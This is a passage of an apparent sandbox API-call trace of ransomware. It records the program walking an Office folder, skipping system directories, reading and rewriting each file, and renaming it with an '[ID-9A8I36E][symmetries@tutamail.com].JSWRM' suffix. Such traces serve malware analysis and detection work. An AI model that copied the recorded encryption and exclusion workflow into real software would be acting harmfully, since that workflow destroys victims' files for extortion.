cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ROSE.CSS", lpUsedDefaultChar=0x0) returned 8 [0121.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0121.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0121.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0121.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0121.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ROSE.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\rose.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.088] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3450) returned 1 [0121.088] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.088] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd70) returned 0x206858 [0121.088] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0121.089] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.089] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0121.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0121.089] CloseHandle (hObject=0x238) returned 1 [0121.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0121.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0121.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0121.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0121.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0121.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0121.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0121.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ROSE.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\rose.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ROSE.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\rose.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0121.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0121.091] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1702fda, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1702fda, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1729263, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xe050, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SAVASWEB.VSL", cAlternateFileName="")) returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2=".") returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="..") returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="...") returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="windows") returned -1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="recovery") returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="perflogs") returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="documents and settings") returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="$RECYCLE.BIN") returned 1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="system volume information") returned -1 [0121.091] lstrcmpiW (lpString1="SAVASWEB.VSL", lpString2="msocache") returned 1 [0121.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0121.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.VSL", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVASWEB.VSL", lpUsedDefaultChar=0x0) returned 12 [0121.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0121.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0121.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.VSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SAVASWEB.VSL", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SAVASWEB.VSL", lpUsedDefaultChar=0x0) returned 12 [0121.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0121.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0121.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0121.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0121.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SAVASWEB.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\savasweb.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.092] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=57424) returned 1 [0121.092] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe050) returned 0x24e1d8 [0121.092] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe050, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe050, lpOverlapped=0x0) returned 1 [0121.168] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.168] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe050, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe050, lpOverlapped=0x0) returned 1 [0121.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.169] CloseHandle (hObject=0x238) returned 1 [0121.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0121.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0121.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0121.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0121.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0121.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0121.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.170] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SAVASWEB.VSL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\savasweb.vsl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SAVASWEB.VSL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\savasweb.vsl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0121.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0121.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0121.175] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf0194432, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf0194432, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xaf2ed8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e1c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SETLANG.HXS", cAlternateFileName="")) returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2=".") returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="..") returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="...") returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="windows") returned -1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="recovery") returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="perflogs") returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="documents and settings") returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="$RECYCLE.BIN") returned 1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="system volume information") returned -1 [0121.175] lstrcmpiW (lpString1="SETLANG.HXS", lpString2="msocache") returned 1 [0121.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0121.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.HXS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG.HXS", lpUsedDefaultChar=0x0) returned 11 [0121.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0121.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0121.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG.HXS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG.HXS", lpUsedDefaultChar=0x0) returned 11 [0121.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0121.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0121.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0121.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.176] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.176] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0121.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.177] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=134684) returned 1 [0121.177] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20e10) returned 0x24e1d8 [0121.178] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x20e10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x20e10, lpOverlapped=0x0) returned 1 [0121.188] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.188] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x20e10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x20e10, lpOverlapped=0x0) returned 1 [0121.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.190] CloseHandle (hObject=0x238) returned 1 [0121.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0121.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0121.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0121.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0121.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0121.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0121.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.190] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0121.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0121.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0121.191] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x281, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SETLANG_COL.HXC", cAlternateFileName="SETLAN~1.HXC")) returned 1 [0121.191] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2=".") returned 1 [0121.191] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="..") returned 1 [0121.191] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="...") returned 1 [0121.191] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="windows") returned -1 [0121.191] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="recovery") returned 1 [0121.191] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="perflogs") returned 1 [0121.191] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="documents and settings") returned 1 [0121.192] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0121.192] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="system volume information") returned -1 [0121.192] lstrcmpiW (lpString1="SETLANG_COL.HXC", lpString2="msocache") returned 1 [0121.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0121.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0121.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXC", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0121.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SETLANG_COL.HXC", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SETLANG_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0121.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0121.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0121.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0121.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0121.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SETLANG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\setlang_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.193] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=641) returned 1 [0121.193] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 